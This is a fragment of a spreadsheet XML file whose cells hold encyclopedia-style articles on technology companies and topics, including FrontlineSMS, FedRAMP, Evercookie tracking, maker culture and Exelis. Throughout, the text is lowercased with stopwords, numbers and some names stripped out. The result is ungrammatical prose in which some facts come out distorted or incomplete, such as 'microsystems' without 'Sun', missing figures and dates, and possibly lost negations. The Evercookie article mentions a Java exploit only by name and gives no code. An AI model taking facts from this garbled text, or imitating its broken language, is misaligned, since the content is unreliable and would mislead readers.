    <t>this list analytics software used collect display data visiting website users. self-hosted software free open source (floss) this comparison table analytics software released free software license. proprietary this comparison table analytics proprietary software. hosted software service this comparison table hosted analytics software service. references external links list analytics software curlie</t>
  </si>
  <si>
    <t>Federated content</t>
  </si>
  <si>
    <t>federated content digital media content designed self-managing support reporting rights management peer-to-peer (p2p) network. audio stored digital rights management (drm) file format.</t>
  </si>
  <si>
    <t>FrontlineSMS</t>
  </si>
  <si>
    <t>frontlinesms free open source software used variety organizations distribute collect information text messaging (sms). software works without internet connection cell phone computer. history software originally developed 2005 banks conservationists keep touch communities kruger national park south africa. release deep redesign first version install browser-based interface java frontlinesms backend. usage frontlinesms enables users connect range mobile devices computer send receive text messages. software works without internet connection connecting device cell phone modem local phone number. frontlinesms send receive messages, group contacts, respond messages, trigger events. internet access available, frontlinesms connected online services feed incoming messages e-mail services. frontlinesms includes different features enable messages filtered keyword, allows submission java-based forms frontlinesms forms. used monitor national elections philippines, afghanistan nigeria. example, april 2007 used network mobile election monitors (nmem) oversee 2007 nigerian general election. volunteers mobile phones sent back reports election booths central effort prevent vote rigging. similar system deployed monitor 2009 afghan presidential election, combined crisis-mapping tool ushahidi, plot reports online map. after 2010 haiti earthquake, frontlinesms team members helped establish 4636 short code related organizations (ushahidi, instedd) allow people ground report emergency information.frontlinesms sister organizations also improving provision healthcare developing countries, roads, long distances, shortage healthcare workers make delivering care difficult. frontlinesms:medic uses frontlinesms software gather health data assist patient follow-up. community health workers frontlinesms:medic transmit information symptoms follow patients much quickly efficiently sending text message rather driving long distances roads). when frontlinesms:medic first introduced area malawi, local hospital doubled number tuberculosis patients treated months, saving 2,100 hours travel work time $3,500 costs. tool used countries, mostly saharan africa. june 2010, frontlinesms:medic team released public beta patientview, allows hospitals manage patient information rural settings internet access. frontlinesms:medic team also working monitoring system capture symptoms across different languages spellings detect disease hotspots, working researcher university california, angeles develop addition would allow remote diagnosis malaria sexually transmitted diseases, including potentially hiv. license frontlinesms licensed lgpl. licensing defined software's sourceforge page. references external links official website</t>
  </si>
  <si>
    <t>Federal Signal Corporation</t>
  </si>
  <si>
    <t>federal signal corporation american manufacturer headquartered brook, illinois. federal signal manufactures street sweeper vehicles, public address systems, emergency vehicle equipment, emergency vehicle lighting. company operates groups: federal signal environmental solutions federal signal safety security systems. federal signal environmental solutions group manufactures street sweeper vehicles, sewer cleaner vacuum loader trucks, hydro excavators, waterblasting equipment, dump truck bodies, trailers. federal signal safety security systems group manufactures campus alerting systems, emergency vehicle lighting, emergency sirens, alarm systems, public address systems. currently, company manufacturing facilities five different countries. history federal signal founded chicago, illinois, federal electric company 1901 brothers john james gilchrist partner john goehst, manufacturing selling store signs incandescent lamps. 1915, began manufacturing selling electrically operated mechanical sirens (such siren model siren). during time, federal electric came ownership commonwealth edison, eventually becoming part utility empire samuel insull.by 1950s, company manufacturing outdoor warning sirens, notably thunderbolt series, primarily intended warning raids fallout cold war. many sirens removed, still operate tornado siren systems. longtime engineer earl gosswiller patented beacon-ray twinsonic products, popular emergency vehicle lightbars. 1955, company became corporation, renaming "federal sign signal corporation". time, made outdoor warning sirens, police sirens, fire alarms, outdoor lighting. 1961, federal sign signal gone public, trading nasdaq market. this products started manufactured sold, federal signal model 1976, company became federal signal corporation. 2000, federal signal corporation announced signing definitive agreement acquisition p.c.s. company.on june 2005, federal signal corporation announced signing joint venture agreement establish chinese company, federal signal (shanghai) environmental sanitary vehicle company limited, based near shanghai, china.on february 2016, federal signal announced signing definitive agreement acquisition canada's largest infrastructure-maintenance equipment supplier johnson equipment (1), rights name company.on 2017, federal signal announced acquisition truck bodies equipment international (tbei), making owner dump body trailer brands, including crysteel, duraclass, rugby manufacturing, bodies, travis j-craft.on july 2019, federal signal completed acquisition assets operations mark rite lines equipment company, inc., manufacturer road-marking equipment. along highmark traffic services, inc., provides road-marking services montana. signing purchase agreement previously announced 2019. also rumbler (siren) federal signal model references</t>
  </si>
  <si>
    <t>FedRAMP</t>
  </si>
  <si>
    <t>federal risk authorization management program (fedramp) united states federal government-wide program provides standardized approach security assessment, authorization, continuous monitoring cloud products services.in 2011, office management budget (omb) released memorandum establishing fedramp provide cost-effective, risk-based approach adoption cloud services executive departments agencies." general services administration (gsa) established fedramp program management office (pmo) june 2012. fedramp mission promote adoption secure cloud services across federal government providing standardized approach security risk assessment. memorandum, cloud services hold federal data must fedramp authorized. fedramp prescribes security requirements process cloud service providers must follow order government service. there ways authorize cloud service fedramp: joint authorization board (jab) provisional authorization (p-ato), individual agencies.before introduction fedramp, individual federal agencies managed assessment methodologies following guidance federal information security management 2002. governance applicable laws fedramp governed different executive branch entities work collaborative manner develop, manage, operate program. these entities include: office management budget (omb): governing body issued fedramp policy memo, defines requirements capabilities program joint authorization board (jab): primary governance decision-making body fedramp comprises chief information officers (cios) department homeland security (dhs), general services administration (gsa), department defense (dod) national institute standards technology (nist): advises fedramp fisma compliance requirements assists developing standards accreditation independent 3paos department homeland security (dhs): manages fedramp continuous monitoring strategy including data feed criteria, reporting structure, threat notification coordination, incident response federal chief information officers (cio) council: disseminates fedramp information federal cios representatives cross-agency communications events fedramp pmo: established within responsible development fedramp program, including management day-to-day operationsthere several laws, mandates, policies foundational fedramp. fisma–the federal information security modernization act–requires agencies authorize information systems use. fedramp fisma cloud. fedramp policy memo requires federal agencies fedramp assessing, authorizing, continuously monitoring cloud services order agencies authorization process well save government resources eliminate duplicative efforts. fedramp's security baselines derived nist 800-53 revised) control enhancements pertain unique security requirements cloud computing. third-party assessment organizations third-party assessment organizations (3paos) play critical role fedramp security assessment process, independent assessment organizations verify cloud providers’ security implementations provide overall risk posture cloud environment security authorization decision. accredited american association laboratory accreditation (a2la), assessment organizations must demonstrate independence technical competence required test security implementations collect representative evidence. fedramp marketplace fedramp marketplace provides searchable, sortable database cloud service offerings (csos) achieved fedramp designation. 3paos, accredited auditors perform fedramp assessment, listed within marketplace. fedramp marketplace maintained fedramp program management office (pmo). also cloud computing issues fedramp authorization references external links official website fedramp marketplace fedramp memo (2011)</t>
  </si>
  <si>
    <t>Evercookie</t>
  </si>
  <si>
    <t>evercookie (also known supercookie) javascript application programming interface (api) identifies reproduces intentionally deleted cookies clients' browser storage. created samy kamkar 2010 demonstrate possible infiltration websites respawning. websites adopted mechanism identify users even attempt delete previously stored cookies.in 2013, edward snowden leaked top-secret document showed evercookie track (anonymity networks) users. many popular companies functionality similar evercookie collect user information track users. further research fingerprinting search engines also draws inspiration evercookie's ability track user persistently. background there three commonly used data storages, including http cookies, flash cookies, html5 storage, others. when user visits website first time, server generate unique identifier store user's browser local space. website read identify user future visits stored identifier, website save user's preferences display marketing advertisements. privacy concerns, major browsers include mechanisms deleting and/or refusing cookies websites.in response users' increased unwillingness accept cookies, many websites employ methods circumvent users' deletion cookies. started 2009, many research teams found popular websites used flash cookies, etags, various data storage rebuild deleted cookies users, including hulu.com, foxnews.com, spotify.com, etc. 2010, samy kamkar, californian programmer, built evercookie project illustrate tracking mechanism respawning across various storage mechanisms browsers. description evercookie allows website authors able identify users even said users attempted delete cookies. samy kamkar released v0.4 beta evercookie september 2010, open source. evercookie capable respawning deleted http cookies storing cookies multiple different storage systems typically exposed browsers. when browser visits website evercookie server, server generate identifier store various storage mechanisms available browser. user removes stored identifiers browser revisits website, server retrieves identifier storage areas user failed delete. then server copy restore identifier previously cleared storage areas.by abusing various available storage mechanisms, evercookie creates persistent data identifiers, users likely clear storing mechanisms. from list provided samy kamkar, storage mechanisms could used v0.4 beta evercookie available browsers: standard http cookies http strict transport security (hsts) local shared objects (flash cookies) silverlight isolated storage storing cookies encoded values auto-generated, force-cached images using html5 canvas read pixels (cookies) back storing cookies history storing cookies http etags storing cookies cache window.name caching internet explorer userdata storage html5 session storage html5 local storage html5 global storage html5 database sqlite html5 indexeddb java jnlp persistenceservice java cve-2013-0422 exploitsamy kamkar claims intend evercookie project violate internet user privacy sell parties commercial use. however, served inspiration commercial websites later implemented similar mechanisms restore user-deleted cookies. evercookie project open source, meaning everyone access examine code, code purpose. project incorporates html5 storage mechanisms, released months project gained public attentions added persistency. kamkar wished project could demonstrate users' privacy infiltered contemporary tracking tools. far, firefox browser plug-in "anonymizer nevercookie™" block evercookie respawning.the storage mechanisms incorporated evercookie project constantly updated, adding evercookie's persistency. incorporates many existing tracking methods, evercookie provides advanced data tracking tool reduces redundancy data collection methods many commercial websites. with inspiration, increasing number commercial websites used idea evercookie, upon incorporating storage vectors. 2014, research team princeton university conducted large scale study three persistent tracking tools: evercookie, canvas fingerprinting, cookie syncing. team crawled analyzed 100,000 alexa websites, detects storage vector, indexeddb, incorporated evercookie mechanism used weibo.com. team claimed first detection commercial indexeddb. moreover, team discovers cookie syncing used conjunction evercookie. cookie syncing allows data sharing different storage mechanisms, facilitating evercookie's respawning process different storage locations users' browsers. team also discovered instances flash cookies respawning http cookies, http cookies respawning flash cookies commercial websites. those mechanims different evercookie project terms number storage mechanisms employed, possess ideology. among sites research team crawled, websites used flash cookies rebuild http cookies. observed sites belong china (including sina.com.cn, weibo.com, hao123.com, sohu.com, ifeng.com, youku.com, 56.com, letv.com, tudo.com). website identified yandex.ru, search engine russia. applications research team slovak university technology proposed mechanism search engines infer internet users’ intended search words produce personalized search results. often queries internet users contain multiple meanings range across different fields. result, displayed search results search engine contain multitude information, many related searcher. authors proposed searchers’ identity user preference strong indication queries meaning greatly reduce ambiguity search word. research team built metadata-based model extract users’ information evercookie, integrated user interest model search engine enhance personalization search result. team aware traditional cookie easily deleted experiment subjects thus lead incomplete experiment data. research team utilized evercookie's persistency. controversial applications kissmetrics privacy lawsuit friday july 2011, research team university california, berkeley crawled u.s. websites based upon quantcast. team found kissmetrics, third party website provides marketing analytical tools, used http cookies, flash cookies, etags, storage mechanisms employed samy kamkar's evercookie project respawn user's deleted information. other popular websites, hulu.com spotify.com, employed kissmetrics respawn html5 http first party cookies. research team claimed first time etag observed used commercial settings.on report's publication, hulu spotify announced suspended kissmetrics investigation. consumers sued kissmetrics friday violation user privacy. kissmetrics revised privacy policies weekend, indicating company fully respected customers' chose tracked. august 2011, kissmetrics' hiten shah denied kissmetrics' implementation evercookie tracking mechanisms mentioned report, claimed company used legitimate first party cookie trackers. october 2012, kissmetrics agreed $500,000 settle accusation promised refrain using evercookie. tracking 2013, internal national security agency (nsa)'s presentation revealed edward snowden, suggesting evercookie's government surveillance track users. blog responded leaked document post, assuring browser bundles tails operating system provide strong protections evercookie. public attitudes towards data tracking evercookie, many emerged technologies persistent data tracking, response internet users' tendency deleting cookie storage. system information exchange, consumers believe compensated greater personalization information, sometimes even financial compensation related companies. recent related research, however, shows expectations consumer marketers. wall street journal showed felt offended targeted advertisements browsing internet. another survery showed americans felt negative marketers track data generate individualized information. another survey, respondents said would like turn behavioral advertising. behavior data tracking persisted, however, provides knowledge market participants, capitalization knowledge marketable products, operation final marketing actions. also device fingerprint canvas fingerprinting http cookie flash cookie (local shared object) storage indexed database database google gears tracking real-time bidding browser internet privacy html5 javascript cache (computing) browser security browser extension references</t>
  </si>
  <si>
    <t>Evergage</t>
  </si>
  <si>
    <t>evergage cloud-based software allows users collect, analyze, respond user behavior websites applications real-time. 2020, evergage acquired salesforce. rebranded interaction studio. company positions "real-time personalization customer data platform (cdp)."the company founded apptegic 2010 karl wirth greg hinkle, working hat. 2012, evergage finalist techcrunch disrupt startup battlefield shortly thereafter launched cloud-based service. august, 2013, company changed name evergage.in 2015, evergage expanded capabilities include multivariate testing, well automated product content recommendations driven machine learning. platform also added personalization support mobile apps and, 2016, open-time email personalization, triggered email 2017. evergage acquired e-commerce email personalization provider mybuys 2018. also software service analytics customer data platform references</t>
  </si>
  <si>
    <t>Everykey</t>
  </si>
  <si>
    <t>everykey designs builds patented universal smart unlock devices online accounts devices. idea began entrepreneurship class project case western reserve university. crowdfunding campaign everykey launched kickstarter campaign october 2014. within hours, campaign reached trending status raised $25,000 pre-orders. project quickly gained attention, everykey launched another crowdfunding campaign indiegogo john mcafee december 2015. while media outlets wired techcrunch excited traction, also expressed concern security versus convenience factor product. writers business insider focused vision company, exploring everykey’s future plans classroom origin story. products company's debut product electronic wristband designed replace keys passwords. development prototype working product funded kickstarter campaign. current product, resembling thumb drive inserted wristband accessory, funded indiegogo crowdfunding campaign. software enables everykey work variety computer mobile platforms. everykey currently offers hardware thumb-drive style product well ring accessory, band accessory, charging cable, bluetooth dongle. technology everykey bluetooth device communicate securely unlimited number bluetooth devices, simultaneously. everykey device employs patented method including encryption allow user unlock devices login online accounts without type passwords. when user leaves everykey, lock everything back online accounts. everykey’s patented method allows perform unlocking locking actions without plugging device. reception many skeptical everykey’s legitimacy company’s delayed shipment early adopters. john mcafee’s involvement company’s brand ambassador controversial, concerned others elated regarding involvement. company hosted r/iama style open forum reddit anyone could topics ranging security late delivery. everykey since addressed many initial concerns, selling products retailers best buy, newegg, office depot. competitors password managers market, everykey competes lastpass, 1password dashlane. hardware security market, everykey's competitors include nymi yubikey. awards everykey recognized many local state organizations ceo’s flashy pitch style grassroots backstory: prototech place launchtown place north coast opportunities technologies fund award fund conference place best startup culture ohio, finalist morgenthaler-pavey startup competition place references external links everykey website</t>
  </si>
  <si>
    <t>SWsoft</t>
  </si>
  <si>
    <t>swsoft privately held server automation virtualization software company parent company parallels. swsoft developed software running data centers, particularly web-hosting services companies, application service providers, managed service providers. swsoft products included applications operating system-level virtualization, enables users multiple operating systems, including windows, linux, solaris, single computer. company founded 1997 maintained headquarters herndon, virginia additional offices throughout north america, europe, asia. research development offices located moscow, russia sales offices germany singapore.in december 2007, swsoft announced plans change name parallels 2008 ship products parallels brand name. company history 1997 swsoft founded 2001 virtuozzo released hspcomplete released 2003 swsoft acquires automation firms yippi-yeah! e-business gmbh (makers confixx) plesk (makers confixx plesk) datacenter released open fusion launched 2004 announces partnership acronis plesk released sitebuilder beta released acquires parallels, inc. keeps secret. 2007 december swsoft announces change name "parallels" 2008. 2007 december: swsoft acquires webhostautomation developers helm control panel. january 2008 swsoft officially becomes parallels, inc. uses swsoft’s virtualization software predominantly used automate data center server management consolidate multiple servers onto windows- linux-based physical server. company’s products developed predominantly hosting companies, service providers, corporations. although company’s software reportedly uses fewer system resources require virtualized server independent operating system, overall flexibility limited. example, virtualized virtuozzo server must version operating system, running linux, operating systems' kernel must modified standard version. references</t>
  </si>
  <si>
    <t>Sun Java System Access Manager</t>
  </si>
  <si>
    <t>java system access manager microsystems' access management product component java enterprise system. java system access manager provides single sign-on, federation secure service functionality. also opensso external links java system access manager- official product page application integration: java system access manager 2004q2 jdbc authentication module</t>
  </si>
  <si>
    <t>Excellent SME</t>
  </si>
  <si>
    <t>excellent international project, aiming establish white list small medium enterprises (sme) means certification system. project brings emphasis site certification, since internet becoming prevailing media promotion search business opportunities partners. principles project built three pillars: institution trust, preferably chamber commerce, assuming role issuer credit rating data provided credit rating agency technology enables easy verification certificate validity consequently prevents dilution trust caused forgery ("safesigned".). criteria excellent certificate obtained companies meeting basic criteria: small medium enterprise (usually employees, measures apply different countries) minimum turnover 25000 credit score least (out 10), credit scoring systems.the certificate issued period year. however credit score permanent monitoring certificate revoked prematurely holder's credit score drops history project initiated 2012 slovenia partners chamber commerce industry slovenia, credit rating agency "coface slovenija". technology provider connet d.o.o. "safesigned(r) technology". serbia joined project year. 2013 macedonia romania followed. 2014 bulgaria joined. references sources external links official website</t>
  </si>
  <si>
    <t>Sun Certified Network Administrator</t>
  </si>
  <si>
    <t>scna abbreviation certified network administrator) certification system administrators covers lans solaris. requirements candidates must pass certification exam. examination includes multiple-choice, scenario-based questions, drag-and-drop questions, tests candidate solaris network administration topics including configure manage network interface layer, network (internet transport layers), network applications, solaris filter. candidates must three years experience administering systems networked environment. certification also requires already certified system administrator solaris (any edition). references</t>
  </si>
  <si>
    <t>Maker culture</t>
  </si>
  <si>
    <t>maker culture contemporary subculture representing technology-based extension culture intersects hardware-oriented parts hacker culture revels creation devices well tinkering existing ones. maker culture general supports open-source hardware. typical interests enjoyed maker culture include engineering-oriented pursuits electronics, robotics, printing, computer numeric control tools, well traditional activities metalworking, woodworking, and, mainly, predecessor, traditional arts crafts. subculture stresses cut-and-paste approach standardized hobbyist technologies, encourages cookbook re-use designs published websites maker-oriented publications. there strong focus using learning practical skills applying reference designs. there also growing work equity maker culture. philosophical emphasis maker movement social movement artisan spirit. promoting equity maker movement fundamental success democratizing access steam tech-rich domains. maker culture emphasizes learning-through-doing (active learning) social environment. maker culture emphasizes informal, networked, peer-led, shared learning motivated self-fulfillment. maker culture encourages novel applications technologies, exploration intersections traditionally separate domains ways working including metal-working, calligraphy, film making, computer programming. community interaction knowledge sharing often mediated networked technologies, websites social media tools forming basis knowledge repositories central channel information sharing exchange ideas, focused social meetings shared spaces hackerspaces. maker culture attracted interest educators concerned students’ disengagement stem subjects (science, technology, engineering mathematics) formal educational settings. maker culture seen potential contribute participatory approach create pathways topics make alive relevant learners. some maker movement reaction de-valuing physical exploration growing sense disconnection physical world modern cities. many products produced maker communities focus health (food), sustainable development, environmentalism local culture, point view also seen negative response disposables, globalised mass production, power chain stores, multinationals consumerism. reaction rise maker culture, barack obama pledged open several national research development facilities public. addition u.s. federal government renamed national centers "america makes".the methods digital fabrication—previously exclusive domain institutions—have made making personal scale accessible, following logical economic progression similar transition minicomputers personal computers microcomputer revolution 1970s. 2005, dale dougherty launched make magazine serve growing community, followed launch maker faire 2006. term, coined dougherty, grew full-fledged industry based growing number diyers want build something rather spurred primarily advent reprap printing fabrication prototypes, declining cost broad adoption opened realms innovation. become cost effective make item prototyping small number household items), approach depicted personal fabrication market person". makerspaces rise maker culture closely associated rise hackerspaces, fablabs "makerspaces", many around world, including germany united states. hackerspaces allow like-minded individuals share ideas, tools, skillsets. some notable hackerspaces linked maker culture include artisan's asylum, dallas makerspace, noisebridge, resistor, pumping station: one, techshop. addition, identify subculture found traditional universities technical orientation, carnegie mellon university (specifically around "shop" areas like hobby shop robotics club). maker culture becomes popular, hackerspaces labs becoming common universities public libraries. federal government started adopting concept fully open makerspaces within agencies, first (spaceshop rapid prototyping lab) resides nasa ames research center. europe popularity labs prominent three times labs exist there.outside europe maker culture also rise, several hacker makerspaces landmarks respective cities' entrepreneurial educational landscape. more precisely: hackerspacesg singapore team leading city-state's (and, arguably, south-east asia's) prominent accelerator jfdi.asia. lamba labs beirut recognized hackerspace people collaborate freely, city often divided different ethnic religious groups. xinchejian shanghai china's first hackerspace, allows innovation collaboration country known strong internet censorship. with rise cities, host human population 2030, hackerspaces, fablabs makerspaces likely gain traction, places local entrepreneurs gather collaborate, providing local solutions environmental, social economical issues. institute future launched regard maker cities open collaborative online game, generate ideas citizens changing work, production, governance, learning, well-being, neighborhoods, means future". tools hardware cloud cloud computing describes family tools service maker movement, enabling increased collaboration, digital workflow, distributed manufacturing (i.e. download files translate directly objects digitized manufacturing process) sharing economy. this, combined open source movement, initially focused software, expanding open-source hardware, assisted easy access online plans cloud) licensing agreements. some example cloud-based tools include online project repositories like appropedia thingiverse, version-controlled collaborative platforms like github wevolver, knowledge sharing platforms like instructables, wikipedia wikis, including wikihow wikifab platforms distributed manufacturing like shapeways 100k garages. computers programmable microcontrollers single-board computers like arduino, raspberry beaglebone black, intel's galileo edison, many open source, easy program connect devices sensors, displays, actuators. this lowers barrier entry hardware development. combined cloud, technology enables internet things. digital fabrication desktop printing possible various plastics metals. combination open-source microelectronics, create autoreplicant printers, reprap. digital fabrication also includes various subtractive fabrication tech, laser cutting, milling, knitting machines. create one's designs digital fabrication requires digital design tools, like solidworks, autodesk, rhinoceros more recently, less expensive easier software emerged. free, open-source software freecad extremely useful design process. autodesk's fusion free start individuals, onshape tinkercad browser-based digital design software. online project repositories make many parts available digital fabrication—even people unable design work. opendesk example company made business designing hosting projects distributed digital fabrication. funding platforms patreon kickstarter examples distributed funding platforms maker movement. hand tools maker culture new, digital technologies. traditional analog tools remain crucial movement. traditional tools often familiar accessible, maker culture. many places projects digital fabrication tools suitable, hand tool are. other types making maker culture involves many types making section reviews major types. amateur scientific equipment this involves making scientific instruments citizen science open source labs. with advent low-cost digital manufacturing becoming increasingly common scientists well amateurs fabricate scientific apparatuses open source hardware designs. docubricks repository open source science hardware. biology, food composting examples maker culture food production include baking, homebrewing, winemaking, home roasting coffee, vegoil, pickling, sausage, cheesemaking, yogurt pastry production. this also extend urban agriculture, composting synthetic biology. clothes many craft objects, also clothing traditionally made home. within maker culture, also clothes seen resurgence. clothes include no-sew hacks, pattern-sharing magazines platforms, burda style. especially open source element picked generation makers, creating open patterns platforms sharing patterns, sewing methods construction techniques. hacking also popular reference clothing cycling.clothing also include knitted crocheted clothing accessories. some knitters knitting machines varying degrees automatic patterning. fully electronic knitting machines interfaced computers running computer-aided design software. arduino boards interfaced electronic knitting machines automate process.free people, popular clothing retailer young women, often hosts craft nights inside doors anthropologie locations. cosmetics maker cosmetics include perfumes, creams, lotions, shampoos, shadow.tool kits maker cosmetics include beakers, digital scales, laboratory thermometers possible, °c), paper, glass rods, plastic spatulas, spray disinfect alcohol. perfumes created home using ethanol (96%, even vodka everclear), essential oils fragrance oils, infused oils, even flavour extracts (such pure vanilla extract), distilled spring water glycerine. tools include glass bottles, glass jar, measuring cup/measuring spoons, dropper, funnel, aluminum foil wrapping paper. musical instruments concept homemade experimental instruments music roots prior maker movement, complicated experiments figures reed ghazala michel waisvisz pioneering early circuit bending techniques simple projects cigar guitar. bart hopkin published magazine experimental musical instruments years followed series books instrument building. organizations zvex, worm, steim, death audio, casper electronics cater do-it-yourself audience, musicians like nicolas collins yuri landman create perform custom made experimental instruments. synth while still living home hugh caine began lifelong interest electronic music sound generation. 1937, designed electronic free reed organ, mid-1940s, built electronic sackbut, recognised first synthesizers. 1953, robert moog produced theremin design, following year published article theremin radio television news. year, founded moog, selling theremins theremin kits mail order home. customers, raymond scott, rewired moog's theremin control keyboard, creating clavivox. john simonton founded paia electronics oklahoma city 1967 began offering various small electronics kits mail order. starting 1972 paia began producing analog synthesizer kits, modular all-in-one form. also eurorack, open source tool making makers also make fabricate tools. this includes knives, hand tools, lathes, printers, wood working tools, etc. vehicles car, also known "component car", automobile available parts manufacturer sells buyer assembles functioning car. tuning include electric vehicle conversion. motorcycle making conversions also represented. examples: tinker bike open source motorcycle adaptable recycled components; nightshift bikes small, makerist project custom, electric motorcycle conversions.bicycles, too, diy, maker-style community. zenga bros' tall bikes example. community bike workshops specific type makerspaces. media make magazine published since 2004 o'reilly media), considered "central organ maker movement," founder, dale dougherty, widely considered founder movement. other media outlets associated movement include wamungo, hackaday, makery, popular weblog boing boing. boing boing editor cory doctorow written novel, makers, describes book people hack hardware, business-models, living arrangements discover ways staying alive happy even economy falling toilet".in 2016 intel sponsored reality show—america's greatest makers—where teams makers compete million. maker faires since 2006 subculture held regular events around world, maker faire, 2012 drew crowd 120,000 attendees. smaller, community driven maker faires referred mini maker fairs also held various places o'reilly-organised maker faire held. maker faire provides mini maker faire starter encourage spread local maker faire events.following maker faire model, similar events maker faire brand emerged around world. maker film fest maker film festival announced august 2014 powerhouse science center durango, colorado, featuring "films about makers, makers making movies." production response covid-19 maker movement galvanized response outbreak covid-19 pandemic, participants initially directing skills toward designing open source ventilators. they subsequently targeted production personal protective equipment (ppe). disruption supply chains mounting problem, particularly early days pandemic, compounded shortages related covid-19 pandemic medical sectors. response largely regional spread across countries continents, coordinated response, designs shared insights intermediary organizations tikkun olam makers, fouhdation open source medical supplies included 70,000 people.national movements emerged germany, brazil, romania, france, spain, india, united kingdom. said movements used distributed manufacturing methods; cooperated local government entities, local police national military help locate supply shortages manage distribution.total production figures sides maker community exceeded 48.3 million units produced, totaling market value $271 million. most-produced items included face shields million), medical gowns million) face masks million). primary modes production utilized familiar tools like printing, laser cutting sewing machines, multiple maker organizations scaled production output pooling funds afford high-output methods like cutting injection molding. criticisms maker movement times criticized fulfilling goals inclusivity democratization. famous critiques come chachra's piece, maker atlantic, criticizing movement's gendered history present; evgeny morozov's making yorker, challenging movement's potential actually disrupt democratize innovation; will holman's toaster paradox, thomas thwaites' toaster project's challenges "maker impulse."others criticize maker movement even movement, posit fundamental hypocrisy extends limit scope impact every aspect "movement." gender over past years, various incidents heightened awareness gender inclusiveness issues within outside movement. discussion public discussion-list lists.hackerspaces.org 2013 highlighted problems women experience within maker culture. frequently cited message discussion contribution david powell wrote: hackerspace female wants females hackerspace start campaign find females. could host class e-textiles whatever females like talk about.” this post outraged many.another example dale dougherty, many considered father movement, publicly discredited naomi chinese female maker. twitter account, wrote: questioning really naomi persona, real person. several many people.” after widespread criticism, dougherty apologised days later. addresses gender inclusiveness issues within making twitter profile description: “it's merit merit tits”.as reaction widespread male-biased within making communities, women people different genders started setting feminist makerspaces. henry, maker francisco, double union, “supportive community feminist activism.” other feminist makerspaces baltazar’s laboratory vienna heart code berlin. also references external links informal crowd-sourced research ananse group maker manifiesto. maker movement, foundation</t>
  </si>
  <si>
    <t>Exelis Inc.</t>
  </si>
  <si>
    <t>exelis inc., global aerospace, defense, information services company created october 2011 result spinoff corporation's defense business independent, publicly traded company. company headquartered tysons corner, virginia, president david melcher. washington post highlighted exelis company washington, d.c. region 2011. acquired harris corporation $4.75 billion 2015. history detailed company history prior october 2011, corporation exelis inc. three major companies made corporation, company provided numerous communications, defense water services. founded small communications company puerto rico telephone company brothers sosthenes hernan behn. through series business patent acquisitions, company grew renamed international telephone telegraph 1920. continued grow appointing harold geneen 1959. until retirement position 1977, geneen responsible growing company medium-sized business earning $765 million 1961 international conglomerate making billion sales 1970. company acquired companies geneen's tenure; point acquisition rate reached deal week. ownership extended notable companies continental baking, maker wonder bread twinkie, sheraton hotels avis rent-a-car. brief period mid-1960s, talks acquire television radio networks deal fell regulatory scrutiny. following geneen's retirement, went restructuring phase rand araskog split three companies 1995: corporation (formerly industries), sheraton, hartford, insurance company. 2011 spin-off january 2011, corporation board directors approved plan split firm. october 2011, corporation spun defense water technology businesses form three separate, publicly traded companies: exelis inc., global aerospace, defense, information services company headquartered tysons corner, virginia. xylem inc., water technology firm. corporation, manufacturing firm.from spin nov. 2013, exelis known exelis help ease transition company's brand. exelis employed approximately 19,000 people generated $5.5 billion sales 2012. 2015 purchase february 2015, exelis announced plans approved sale company cash/stock purchase competitor harris corporation. purchase price 4.75 billion dollars reported highest defense company purchases, since lockheed/martin merger. when finalized june 2015, purchase expected make harris/exelis defense contractors united states. company structure exelis businesses specialize different technologies services. aerostructures located salt lake city, utah exelis aerostructures business designer manufacturer lightweight composite aerospace structures, subassemblies components. major products: exelis aerostructures subcontractor boeing 7-series family aircraft, including composite air-frame substructures dreamliner, airbus a380 aircraft well sikorsky s-76 helicopter. defense programs, provide complete structural assemblies, flight critical components well primary secondary structural elements platforms lockheed martin f-35 lightning sikorsky ch-53k king stallion heavy lift helicopter, boeing c-17 globemaster lockheed martin joint air-to-surface standoff missile (jassm). exelis also produces bear claw line down-hole drillable plugs used well completions. electronic systems headquartered clifton, jersey, major division salt lake city, utah, electronics systems division company offers variety electronic warfare surveillance technologies, including traffic control technology military domestic use, radar sonar systems, antennas signal-jamming devices disarm improvised explosive devices (ied). major products: alq-214 idecm (integrated electronic countermeasures) geospatial systems with facilities located clifton, jersey rochester, york, geospatial systems division manufactures provides technology (clifton), surveillance systems (rochester) data encryption services, well remote sensing navigation technology. company also included facilities wayne designed manufactured instruments weather tracking system.. major products solutions: information systems information systems division headquartered herndon, virginia. division specializes creating secure information electronics systems specific often challenging environments, including defense intelligence missions, census bureau, homeland security, traffic control space missions. mission systems headquartered colorado springs, colorado., mission systems provides facilities, engineering, logistics security support u.s. military bases domestically abroad. night vision communications solutions located wayne, indiana roanoke, virginia, exelis night vision communications solutions (nvcs) provides products services secure voice data communications, battlefield situational awareness, night vision systems global defense, security, battlefield management sectors. major products sincgars single channel ground airborne radio system, military communications system. gnomad (global network move active distribution), satellite military data communications system exelis action corps exelis action corps company's volunteer-service program designed create large-scale, team individual volunteer activities projects support engage service members, veterans families local communities. activities range providing interviewing coaching military service member, painting house disabled veteran, tutoring children service member serving abroad. leadership board directors ralph hakechairman boarddavid melcherchief executive officerjohn hamre paul kern herman bulls patrick moore mark reuss billie williamson david yost management team david melcherpresidentpeter milliganchief financial officerann davidsonchief legal officera. john procopiochief human resources officerrobert durbinstrategy government relationsmike blairvice president aerostructuresrichard sorellepresident electronic systemschristopher youngpresident geospatial systemspamela drewpresident information systemskenneth hunzekerpresident mission systemsdavid albrittonchief communications officernicholas bobaypresident night vision communications systemsvincent thomasvice president operationskaty herrvice president investor relations customers customers currently include: army navy force marine corps department homeland security federal aviation administration nasathe company also clients countries europe, americas, asia, middle east africa, well australia. references external links official website</t>
  </si>
  <si>
    <t>Safe@Office</t>
  </si>
  <si>
    <t>safe@office line firewall appliances developed sofaware technologies, check point company.the check point safe@office product line targeted small medium business segment, includes 500w (with wi-fi) series internet security appliance. s-box, safe@home, series, series, 400w series discontinued. appliances licensed according number protected addresses (referenced users) numbers unlimited. there also variant built-in adsl modem. also vpn-1 edge similar appliance possibility managed check point smartcenter. references external links safe@office product page check point website safe@office product page sofaware website fixing your connection private error browser</t>
  </si>
  <si>
    <t>Magda Lilia Chelly</t>
  </si>
  <si>
